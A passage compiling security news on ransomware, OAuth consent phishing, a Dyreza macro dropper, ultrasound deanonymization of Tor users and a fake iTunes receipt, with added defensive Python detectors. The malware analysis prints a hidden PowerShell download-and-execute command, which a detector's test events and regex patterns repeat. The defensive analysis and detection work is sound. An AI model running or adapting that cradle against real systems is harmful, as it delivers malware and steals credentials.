is sent through a spear-phishing email containing tailored logos and staff names, adding to the deception. Once activated, the variant communicates information including operating system, username, country and system code back to its command and control server, and generates a victim ID, bitcoin wallet ID and bitcoin ransom price. Carl Leonard, principal security analyst at Forcepoint, said: "While processing our open source intelligence feeds we discovered Philadelphia, currently a cheap, poorly written ransomware that is available cheaply to script kiddies. Although the ransom is currently only 0.3 BTC, the command and control paths suggest that the actor is targeting hospitals for this campaign so there are likely to be other targets
The Russian hacking group blamed for targeting U.S. and European elections has been breaking into email accounts, not only by tricking victims into giving up passwords, but by stealing access tokens too. It's a sneaky hack that's particularly worrisome, because it can circumvent Google's 2-step verification, according to security firm Trend Micro. The group, known as Fancy Bear or Pawn Storm, has been carrying out the attack with its favored tactic of sending out phishing emails, Trend Micro said in a report Tuesday. The attack works by sending out a fake email, pretending to be from Google, with the title "Your account is in danger."
[Image: an example of a phishing email that Fancy Bear has used.]
The email claims that Google detected several unexpected sign-in attempts on the recipient's account. It then suggests users install a security application called "Google Defender." However, the application is actually a ruse. In reality, the hacking group is trying to dupe users into giving up a special access token for their Google account, Trend Micro said. Victims who fall for the scheme are redirected to a genuine Google consent page, which can authorize the hacking group's app to view and manage their email. Users who click "Allow" hand over what's known as an OAuth token. Although the OAuth protocol doesn't transfer any password information, it's designed to grant third-party applications access to internet accounts through the use of special tokens. In the case of Fancy Bear, the hacking group has leveraged the protocol to build fake applications that can fool victims into handing over account access, Trend Micro said.
"After abusing the screening process for OAuth approvals, (the group's) rogue application operates like every other app accepted by the service provider," the security firm said. Even Google's 2-step verification, which is designed to prevent unwarranted account access, can't stop the hack, according to Trend Micro. Google's 2-step verification works by requiring not only a password, but also a special code sent to a user's smartphone when logging in. Security experts say it's an effective way to protect your account. However, Fancy Bear's phishing scheme sidesteps this measure by tricking users into granting access through the fake Google security app: the victim completes the real sign-in, second factor included, and then authorizes the app, and the token issued to the app is valid on its own, with no further code asked for. Google, however, said it takes many steps to protect users from such phishing attacks. "In addition, Google detects and reviews potential OAuth abuse and takes down thousands of apps for violating our User Data Policy, such as impersonating a Google app," the company said in a statement. "Note that a real Google app should be directly accessed from a Google site or installed from the Google Play or Apple App stores," it added. According to Trend Micro, victims were targeted with this phishing attack in 2015 and 2016. In addition to Google Defender, Fancy Bear has used other apps under names such as Google Email Protection and Google Scanner. They've also gone after Yahoo users with apps called Delivery Service and McAfee Email Protection.
[Image: the attack attempts to trick users into handing over access to their email through fake Google third-party applications.]
"Internet users are urged to never accept OAuth token requests from an unknown party or a service they did not ask for," Trend Micro said.
Although a password reset can sometimes revoke an OAuth token, it's best to check what third-party applications are connected to your email account. This can be done by looking at the email account's security settings and revoking access where necessary. Fancy Bear is most notorious for its suspected role in hacking the Democratic National Committee last year. However, the group has also been found targeting everything from government ministries and media organizations to universities and think tanks, according to Trend Micro.
Google Docs was pulled into a sneaky email phishing attack on Tuesday that was designed to trick users into giving up access to their Gmail accounts. The phishing emails, which circulated for about three hours before Google stopped them, invited the recipient to open what appeared to be a Google Doc. The teaser was a blue box that said "Open in Docs." In reality, the link led to a dummy app that asked users for permission to access their Gmail account.
[Image: an example of the phishing email that circulated on Tuesday.]
Users might easily have been fooled, because the dummy app was actually named "Google Docs." It also asked for access to Gmail through Google's actual login service, so the address bar and the consent page were genuine; only the app behind the request was not. The hackers were able to pull off the attack by abusing the OAuth protocol, a way for internet accounts at Google, Twitter, Facebook and other services to connect with third-party apps. The OAuth protocol doesn't transfer any password information, but instead uses special access tokens that can open account access. However, OAuth can be dangerous in the wrong hands. The hackers behind Tuesday's attack appear to have built an actual third-party app that leveraged Google's processes to gain account access.
[Image: the dummy app asking for account permission.]
Last month, Trend Micro said a Russian hacking group known as Fancy Bear was using a similar email attack method that abused the OAuth protocol to phish victims. However, security experts said Tuesday's phishing attack probably wasn't from Fancy Bear, a shadowy group that many experts suspect works for the Russian government. "I don't believe they are behind this ... because this is way too widespread," Jaime Blasco, chief scientist at security provider AlienVault, said in an email.
On Tuesday, many users on Twitter, including journalists, posted screenshots of the phishing emails, prompting speculation that the hackers were harvesting victims' contact lists to target more users. The attack was also sent through an email address at "hhhhhhhhhhhhhhhh@mailinator.com." Mailinator, a provider of a free email service, denied any involvement. Fortunately, Google moved quickly to stop the phishing attacks after a user on Reddit posted about them. "We've removed the fake pages, pushed updates through Safe Browsing, and our abuse team is working to prevent this kind of spoofing from happening again," Google said in a statement. Security experts and Google recommend affected users check what third-party apps have permission to access their account and revoke any suspicious access. Users can do so from their account's connected-apps settings page or by performing a Google security check-up. Tuesday's phishing scheme will probably push Google to adopt an even stricter stance on apps that use OAuth, said Robert Graham, CEO of research company Errata Security. However, the internet giant has to strike a balance between ensuring security and fostering a flourishing app ecosystem. "The more vetting you do, the more you stop innovation," Graham said. "It's a trade-off."
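Both OAuth stories above (Fancy Bear's "Google Defender" and the "Google Docs" app) come down to a consent request that looked legitimate because the consent page was Google's own. The following is an added example, not code from Trend Micro, Google or either article, that triages such a request the way a mail gateway or an analyst could before a user clicks "Allow": it parses the authorization URL, checks the app name for impersonation of the provider, compares the client_id against a hypothetical allow-list and flags scopes that hand over the whole mailbox or address book. The client_ids, redirect hosts and allow-list are constructed; the scope strings and the accounts.google.com endpoint are real.

```python
"""Triage an OAuth consent request before a user clicks "Allow".

Added example: not Trend Micro's, Google's or any vendor's code.  It models
the two consent-phishing campaigns above (Fancy Bear's "Google Defender" and
the "Google Docs" worm) as an authorization URL plus the app's display name,
then applies the checks an analyst or mail gateway would apply.
"""
from urllib.parse import urlparse, parse_qs

# Real Google API scope strings; treating them as "whole mailbox / address
# book" is this example's policy choice.
MAILBOX_SCOPES = {
    "https://mail.google.com/",
    "https://www.googleapis.com/auth/gmail.modify",
    "https://www.googleapis.com/auth/gmail.readonly",
    "https://www.googleapis.com/auth/contacts",
    "https://www.googleapis.com/auth/contacts.readonly",
}
# Hypothetical allow-list of client_ids the organisation has reviewed.
APPROVED_CLIENTS = {"1234567890-crm.apps.googleusercontent.com"}
# Names the page's rogue apps borrowed.  A third-party client using them is
# impersonating the provider: a genuine Google app never asks for consent this way.
PROVIDER_WORDS = ("google", "gmail", "yahoo", "mcafee")


def parse_consent_url(url):
    """Pull client_id, redirect_uri and the scope set out of an auth URL."""
    q = parse_qs(urlparse(url).query)
    scopes = set()
    for raw in q.get("scope", []):
        scopes.update(raw.split())          # scopes are space separated
    return {
        "client_id": q.get("client_id", [""])[0],
        "redirect_uri": q.get("redirect_uri", [""])[0],
        "scopes": scopes,
    }


def triage(url, app_name):
    """Return (verdict, findings); verdict is 'block', 'review' or 'allow'."""
    req = parse_consent_url(url)
    findings = []
    impersonates = any(w in app_name.lower() for w in PROVIDER_WORDS)
    if impersonates:
        findings.append("app name %r impersonates the identity provider" % app_name)
    approved = req["client_id"] in APPROVED_CLIENTS
    if not approved:
        findings.append("client_id %s is not on the approved list" % req["client_id"])
    broad = sorted(req["scopes"] & MAILBOX_SCOPES)
    if broad:
        findings.append("requests mailbox/contacts access: " + ", ".join(broad))
        host = urlparse(req["redirect_uri"]).hostname or ""
        findings.append("authorization code would be delivered to %s" % host)
    if impersonates or (broad and not approved):
        verdict = "block"
    elif broad or not approved:
        verdict = "review"
    else:
        verdict = "allow"
    return verdict, findings


# Constructed consent URL modelled on the "Google Defender" lure: host and
# path are Google's real OAuth endpoint, client_id and redirect host are made up.
DEFENDER_URL = (
    "https://accounts.google.com/o/oauth2/auth"
    "?client_id=9988776655-defender.apps.googleusercontent.com"
    "&redirect_uri=https%3A%2F%2Fgoogle-defender.example%2Fcallback"
    "&response_type=code&access_type=offline"
    "&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email"
)
# Constructed request from the (hypothetical) approved CRM app.
CRM_URL = (
    "https://accounts.google.com/o/oauth2/auth"
    "?client_id=1234567890-crm.apps.googleusercontent.com"
    "&redirect_uri=https%3A%2F%2Fcrm.example%2Foauth"
    "&response_type=code&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email"
)

if __name__ == "__main__":
    for name, url in (("Google Defender", DEFENDER_URL), ("Acme CRM", CRM_URL)):
        verdict, findings = triage(url, name)
        print(name, "->", verdict)
        for f in findings:
            print("   ", f)
```

The name check is deliberately blunt: the whole trick in both campaigns was a display name ("Google Defender", "Google Docs") that no third-party client has a legitimate reason to use, and it is the one signal that survives the consent page being genuine. The allow-list is where an organisation's own review of vetted apps would plug in.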
Cyberthreats are a constant risk and affect public administrations significantly, so much so that they have become a powerful instrument of aggression against public entities and citizens. They can lead to a serious deterioration in the quality of service and, above all, to data leaks concerning everything from personal information to state secrets. The combination of new technologies, the increasing complexity of attacks and the professionalization of cybercriminals is highly dangerous. Last December, a large-scale spam campaign spanning more than ten countries was carried out, and it specifically targeted a major European ministry. The attack, delivered by phishing, was highly advanced and combined social engineering tactics with a powerful Trojan. It arrives by email with an attached Word document. At first, we suspected a targeted attack, since the message came, supposedly, from a healthcare company and the recipient was an employee of the Ministry of Health in a European country. The present analysis describes the technical features of the malicious code found in the macro of the Word document. The goal of the macro was to download and run another malicious component. A few static properties of the analyzed files are shown below. The hashes of the Word document are:
MD5: B480B7EFE5E822BD3C3C90D818502068
SHA1: 861ae1beb98704f121e28e57b429972be0410930
According to the document's metadata, the creation date was 2016-12-19. The hashes of the malicious executable that the macro downloads are:
MD5: 3ea61e934c4fb7421087f10cacb14832
SHA1: bffb40c2520e923c7174bbc52767b3b87f7364a9
The Word document reaches the victim's computer by way of a spam email purporting to come from a healthcare company.
The text tricks the recipient into believing that the content is protected and that the macro must be run in order to gain access to it. According to the data recovered by Panda Security's Collective Intelligence, this spam campaign took place on December 19, 2016 and affected several countries.
Interactions with the infected system
The basic function of the macro is to download and run another malicious code from a URL embedded in the macro itself. The macro is also designed to run immediately when the document is opened.
[Image: part of the obfuscated code contained in the macro.]
Once the macro is running, the Word document executes the following command on the system:
cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN (NeW-oBjECt sYstEm.NeT.webcLiENt).DOWNloAdFILE(‘http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe’,’C:\Users\????\AppData\Roaming.eXe’
The command prompt (cmd.exe) launches PowerShell with the parameters visible above: -ExecutionPolicy Bypass disables the script execution restrictions, -NoProfile skips profile scripts, -WindowStyle Hidden keeps the console invisible, and the WebClient.DownloadFile call fetches the executable into the user's AppData\Roaming directory. The random case of the letters is an evasion against simple string matching, since PowerShell parameters and .NET type names are case-insensitive. Thanks to the data obtained by Panda Security's Collective Intelligence, we know that the final malicious code distributed by this campaign is a variant of the Dyreza family. Panda's clients were protected proactively, without the need for signatures or updates. The purpose of the malicious code is to steal credentials from browsers and add the compromised machine to a botnet. It then waits for commands from the command-and-control server. These commands come from the cybercriminals who operate it, and the bot is able to download further malware and carry out all kinds of malicious actions. Digitization in public administration leads to exponential growth in the creation, storage and management of huge quantities of confidential data — data that leaves no room for a single lapse
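The command line above is typical of a macro download cradle, and the detail that matters for detection is the parent/child chain (Word spawning cmd.exe, which spawns PowerShell) together with the mangled-case flags. The following is an added example, not Panda Security's code, that scores constructed process-creation events for those indicators and extracts the download URL and drop path. The events, the domain (malicious-example.invalid), the username and the drop file name are placeholders, since the report redacts them; only the downloaded file name 13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe is taken from the report.

```python
"""Flag Office-spawned PowerShell download cradles in process-creation events.

Added example, not Panda Security's code.  The events below are constructed to
look like the macro's behaviour described above (Word -> cmd.exe -> PowerShell
downloading an executable); domain, username and drop file name are placeholders
because the original report redacts them.
"""
import re

# Each pattern is one indicator.  PowerShell accepts any unambiguous prefix of a
# parameter name, so -ep / -ex / -ExecutionPolicy, -w / -WindowStyle and
# -nop / -NoProfile all have to match.  re.I handles the case mangling.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-(?:ex\w*|ep)\s+bypass", re.I),
    "hidden_window":           re.compile(r"-w\w*\s+hidden", re.I),
    "no_profile":              re.compile(r"-nop\w*", re.I),
    "webclient_download":      re.compile(r"net\.webclient\s*\)?\s*\.\s*download(?:file|string)", re.I),
    "encoded_command":         re.compile(r"-e(?:nc\w*|c)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke_expression":       re.compile(r"\biex\b|invoke-expression", re.I),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://[^\s'\"‘’,)]+")
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\"‘’,)]+")   # quoted drop paths without spaces
THRESHOLD = 3


def analyze(event):
    """Score one process-creation event (dict with parent, image, cmdline)."""
    cmd = event["cmdline"]
    result = {"image": event["image"], "indicators": [], "score": 0,
              "url": None, "drop_path": None, "suspicious": False}
    # The cradle is launched through `cmd.exe /c powershell ...`, so look at
    # the command line rather than the image name alone.
    if not re.search(r"powershell", cmd, re.I):
        return result
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS:
        result["indicators"].append("office_parent")
        result["score"] += 2                 # an Office parent weighs double
    for name, pat in INDICATORS.items():
        if pat.search(cmd):
            result["indicators"].append(name)
            result["score"] += 1
    m = URL_RE.search(cmd)
    if m:
        result["url"] = m.group(0)
    m = PATH_RE.search(cmd)
    if m:
        result["drop_path"] = m.group(0)
    result["suspicious"] = result["score"] >= THRESHOLD
    return result


def analyze_events(events):
    return [analyze(e) for e in events]


# Constructed Sysmon-style events (parent image, image, command line).
EVENTS = [
    {   # the macro from the report; domain, user and drop name are placeholders
        "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"""cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN (NeW-oBjECt sYstEm.NeT.webcLiENt).DOWNloAdFILE('http://malicious-example.invalid/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe','C:\Users\alice\AppData\Roaming\update.exe')""",
    },
    {   # an interactive admin session: one weak indicator, not flagged
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -Command Get-Process",
    },
    {   # a deployment script from a scheduled task: policy bypass alone is not enough
        "parent": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\deploy.ps1",
    },
]

if __name__ == "__main__":
    for r in analyze_events(EVENTS):
        print("SUSPICIOUS" if r["suspicious"] else "ok        ",
              r["score"], r["indicators"], r["url"], r["drop_path"])
```

The scoring is intentionally additive: a policy bypass or a hidden window on its own is common in legitimate administration, but an Office parent plus a WebClient download plus a hidden window is the cradle. The URL and path regexes stop at quote characters (including the curly quotes the report's sample uses), which is enough for the quoted arguments a cradle passes to DownloadFile.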
This attack model was brought to light towards the end of 2016 by a team of six researchers, who presented their findings at the Black Hat Europe 2016 security conference in November and at the 33rd Chaos Communication Congress held last week. When the ad plays on a TV or radio, or some ad code runs on a mobile or computer, it emits ultrasounds that get picked up by the microphone of nearby laptops, desktops, tablets or smartphones. Speaking at last week's 33rd Chaos Communication Congress, Vasilios Mavroudis, one of the six researchers, detailed a deanonymization attack on Tor users that leaks their real IP address and a few other details. The attack that the research team put together relies on tricking a Tor user into accessing a web page that contains ads that emit ultrasounds, or a page that contains hidden JavaScript code that forces the browser to emit the ultrasounds via the HTML5 Audio API. According to Mavroudis, the mobile phone must have an app installed that embeds one of the many advertising SDKs that support uXDT (ultrasound cross-device tracking). In his tests, Mavroudis intercepted some of the traffic these ultrasound beacons trigger on behalf of the phone; because the phone reports the beacon over its own network connection, outside Tor, that traffic contains details such as the user's real IP address, geo-location coordinates, telephone number, Android ID, IMEI code and device MAC address. According to Mavroudis, there are multiple ways to deliver these attacks other than social-engineering Tor users into visiting URLs where the ultrasound beacons can be served. The attackers could also run a malicious Tor exit node and perform a man-in-the-middle attack, forcibly injecting the code that triggers uXDT beacons into all Tor traffic passing through that node (which works only for plaintext HTTP connections, since an exit node cannot modify TLS-protected content).
A simpler attack method would be to hide the ultrasounds, which are inaudible to human ears, inside videos or audio files that certain Tor users might open. The FBI might be very interested in this method and could deploy it to track viewers of child pornography videos on the Tor network, just as it previously did in Operation Playpen, where it used a Flash exploit.
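What a uXDT beacon leaves behind on the receiving side is energy in a narrow band the ear cannot hear. The following is an added example, not the researchers' code, showing how a client-side detector could flag such a beacon without a full FFT: it estimates the amplitude at each candidate frequency with the Goertzel algorithm over a 100 ms block of constructed audio. The band (17 to 22 kHz), the threshold and the 18.5 kHz beacon frequency are assumptions.

```python
"""Look for a near-ultrasonic beacon in a short audio buffer.

Added example, not the researchers' code.  uXDT beacons sit in the band the
page calls inaudible; the exact band and threshold used here (17-22 kHz,
amplitude above 1% of full scale) are assumptions.  The audio is constructed:
a 440 Hz tone (audible content) with an 18.5 kHz tone mixed in at low level.
"""
import math

SAMPLE_RATE = 44100
BLOCK = 4410   # 100 ms; makes each 10 Hz a DFT bin, so 100 Hz steps land on bins


def goertzel_amplitude(samples, freq, sample_rate=SAMPLE_RATE):
    """Amplitude of the sinusoid at `freq` in `samples` via the Goertzel recurrence.

    Cheaper than a full FFT when only a handful of frequencies matter, which is
    the case for a detector running continuously on a phone.
    """
    n = len(samples)
    k = int(0.5 + n * freq / sample_rate)        # nearest DFT bin
    omega = 2.0 * math.pi * k / n
    coeff = 2.0 * math.cos(omega)
    s_prev = s_prev2 = 0.0
    for x in samples:
        s = x + coeff * s_prev - s_prev2
        s_prev2, s_prev = s_prev, s
    power = s_prev * s_prev + s_prev2 * s_prev2 - coeff * s_prev * s_prev2
    # |X[k]| = A*N/2 for a sinusoid of amplitude A exactly on bin k
    return 2.0 * math.sqrt(max(power, 0.0)) / n


def scan_band(samples, lo=17000, hi=22000, step=100, min_amp=0.01):
    """Return (freq, amplitude) for every scanned frequency above min_amp."""
    hits = []
    for f in range(lo, hi + 1, step):
        amp = goertzel_amplitude(samples, f)
        if amp >= min_amp:
            hits.append((f, round(amp, 3)))
    return hits


def synth(tones, n=BLOCK, sample_rate=SAMPLE_RATE):
    """Constructed audio: sum of (amplitude, freq) sinusoids, no noise."""
    return [sum(a * math.sin(2 * math.pi * f * i / sample_rate) for a, f in tones)
            for i in range(n)]


CLEAN = synth([(0.5, 440)])                    # audible tone only
BEACON = synth([(0.5, 440), (0.05, 18500)])    # same, plus a quiet 18.5 kHz beacon

if __name__ == "__main__":
    print("clean :", scan_band(CLEAN))     # expect []
    print("beacon:", scan_band(BEACON))    # expect [(18500, 0.05)]
```

The beacon here is ten times quieter than the audible content and still stands out, because nothing legitimate in ordinary speech or music carries energy that high. On real microphone input the block length and step should be chosen so that the scan frequencies fall on DFT bins, as above; otherwise a window function is needed to keep leakage from neighbouring bins below the threshold.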
A new phishing campaign is using a fake iTunes receipt for movie purchases to compromise Apple users' sensitive information. Fortinet researchers first spotted the phishing campaign over the weekend of 17 February. The attack begins when an Apple user receives a receipt that appears to have come from iTunes. In actuality, an email address based in Norway sent the message. The receipt lists purchases for a series of movies. These films (which include "Allied", "Arrival" and "Jack Reacher: Never Go Back") debuted in theaters recently, which makes the ruse topical and consequently more believable. This email isn't the first time phishers (or smishers, for that matter) have targeted Apple users. Users in the United Kingdom, Australia and the United States have witnessed similar attacks over the past few years. This particular campaign targets Canadian users and seems to have improved upon earlier iterations of the scam. Of course, most users who receive the receipt will wonder why they've been charged so much money for something they haven't purchased. Their attention will subsequently go to the link at the bottom of the email that claims they can obtain a full refund. But clicking on the link doesn't help them in the slightest. As explained by Fortinet's researchers: "At the bottom of the receipt, there's a link to request a "full refund" in case of an unauthorized transaction." Apple has no need for a user's Social Insurance Number, which Canadians need in order to work or to access government services, or their mother's maiden name. But the phishers want their targets to overlook that fact and enter their details. Indeed, doing so would help the attackers assume control of their victim's credit card and other financial information. This campaign, like so many others, demonstrates the importance of carefully reviewing suspicious emails.
Users should look at the sending email address to see if it's legitimate. If they come across an invoice or receipt for a credit card purchase, they should check their account history for such a transaction. If they don't find anything, the scammers are just trying to scare them into handing over their payment card details. Additionally, users might consider setting up transaction notifications on their payment cards. That way, if they haven't received an alert of a transaction, they'll immediately know that an invoice such as the one above is a fake.
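The advice above (check the sender address, and distrust a receipt that asks for a Social Insurance Number) can be applied mechanically to the message headers and body. The following is an added example, not Fortinet's code, that parses a constructed receipt modelled on the lure, compares the display name with the sending domain, checks the Reply-To and the "full refund" link against an assumed list of the brand's domains, and looks for requests for data a receipt has no reason to ask for. The sender domains, link hosts and the brand allow-list are assumptions.

```python
"""Triage a suspected fake receipt from its headers, links and body.

Added example, not Fortinet's code.  The message below is constructed to mirror
the lure described above (a receipt for recent films with a "full refund"
link); the sender domain, link host and prices are made up.  The list of
domains a genuine Apple receipt comes from is an assumption to be replaced
with what your own mail logs show.
"""
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

BRAND_WORDS = ("itunes", "apple")
BRAND_DOMAINS = {"apple.com", "itunes.com"}          # assumption, see above
SENSITIVE = ("social insurance number", "mother's maiden name",
             "card number", "security code", "cvv")
LINK_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def in_domains(host, domains):
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in domains)


def triage_receipt(raw):
    """Return (verdict, findings); verdict is 'phish', 'review' or 'ok'."""
    msg = email.message_from_string(raw, policy=policy.default)
    name, addr = parseaddr(str(msg["From"]))
    from_domain = addr.rsplit("@", 1)[-1].lower()
    body = msg.get_body(preferencelist=("html", "plain")).get_content()
    findings = []

    # 1. Display name claims the brand but the address is somewhere else.
    if any(w in name.lower() for w in BRAND_WORDS) and not in_domains(from_domain, BRAND_DOMAINS):
        findings.append("sender %s claims %r but is not a brand domain" % (addr, name))

    # 2. A Reply-To pointing away from the sender is a common trait of kits.
    reply_to = parseaddr(str(msg["Reply-To"] or ""))[1]
    if reply_to and reply_to.rsplit("@", 1)[-1].lower() != from_domain:
        findings.append("Reply-To %s differs from From domain" % reply_to)

    # 3. The action link ("full refund") leaves the brand's domains.
    for href, text in LINK_RE.findall(body):
        host = urlparse(href).hostname
        if not in_domains(host, BRAND_DOMAINS):
            label = re.sub(r"\s+", " ", text).strip()
            findings.append("link %r points to %s" % (label, host))

    # 4. A receipt has no business asking for these.
    asked = [s for s in SENSITIVE if s in body.lower()]
    if asked:
        findings.append("asks for " + ", ".join(asked))

    verdict = "phish" if len(findings) >= 2 else ("review" if findings else "ok")
    return verdict, findings


# Constructed lure; the Norwegian-looking sender domain is invented.
FAKE_RECEIPT = """\
From: iTunes Store <no-reply@itunes-kvittering.example>
Reply-To: refund-desk@refund-portal.example
To: customer@example.ca
Subject: Your receipt No. 183004917
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Thank you for your purchase from the iTunes Store.</p>
<p>Allied ........ CAD 24.99<br>Arrival ....... CAD 24.99<br>
Jack Reacher: Never Go Back ....... CAD 24.99</p>
<p>If you did not authorise this transaction, you may
<a href="http://refund-portal.example/itunes/refund">request a full refund</a>.
You will be asked to confirm your card number, security code and Social Insurance Number.</p>
</body></html>
"""

# Constructed control message shaped like a genuine receipt under the assumed domains.
REAL_RECEIPT = """\
From: iTunes Store <no_reply@email.apple.com>
To: customer@example.ca
Subject: Your receipt No. 183004918
Content-Type: text/html; charset="utf-8"

<html><body><p>Thank you for your purchase. Questions about a charge? Visit
<a href="https://reportaproblem.apple.com/">Report a Problem</a>.</p></body></html>
"""

if __name__ == "__main__":
    for label, raw in (("fake", FAKE_RECEIPT), ("control", REAL_RECEIPT)):
        verdict, findings = triage_receipt(raw)
        print(label, "->", verdict)
        for f in findings:
            print("   ", f)
```

Each check corresponds to one piece of the article's advice; none of them needs the transaction history, which the user still has to consult for the final word. The domain comparison uses suffix matching so that a legitimate sub-domain of the brand passes while a look-alike such as itunes-kvittering.example does not.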